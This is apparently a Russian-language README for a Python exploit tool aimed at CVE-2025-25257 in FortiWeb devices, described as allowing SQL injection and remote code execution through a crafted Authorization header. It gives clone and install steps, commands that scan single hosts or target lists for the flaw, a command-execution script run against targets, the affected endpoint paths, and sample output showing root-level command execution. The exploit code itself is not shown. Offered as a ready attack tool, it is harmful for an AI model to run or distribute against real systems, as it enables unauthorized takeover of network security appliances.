
Инструмент на Python для проверки и эксплуатации уязвимости CVE-2025-25257 в устройствах FortiWeb. Эта уязвимость позволяет выполнять SQL-инъекции и удалённое выполнение кода через специально сформированный заголовок Authorization.
CVE-2025-25257 — критическая уязвимость в устройствах FortiWeb, которая позволяет:
pip install requests urllib3
git clone https://github.com/yourusername/CVE-2025-25257.git
cd CVE-2025-25257
pip install -r requirements.txt
vuln_check.py)Проверка одной цели:
python3 vuln_check.py -t https://target.com
Проверка нескольких целей из файла:
python3 vuln_check.py -l target.txt
exp.py)Выполнение команд на уязвимой цели:
python3 exp.py -t https://target.com -c "id"
vuln_check.py — Основной инструмент проверки уязвимости и эксплуатацииexp.py — Инструмент выполнения команд для уязвимых целейtarget.txt — Пример списка целей (замените на свой)vuln.txt — Выходной файл с уязвимыми целями (создаётся после сканирования)/api/fabric/device/status/cgi-bin/x.cgiИнструмент создаёт файл vuln.txt, содержащий:
Пример вывода:
# CVE-2025-25257 Vulnerable Targets - 2025-01-27 10:30:15
# Format: [timestamp] target - command_output
[2025-01-27 10:30:15] https://target.com - uid=0(root) gid=0(root) groups=0(root)
credit:0xbigshaq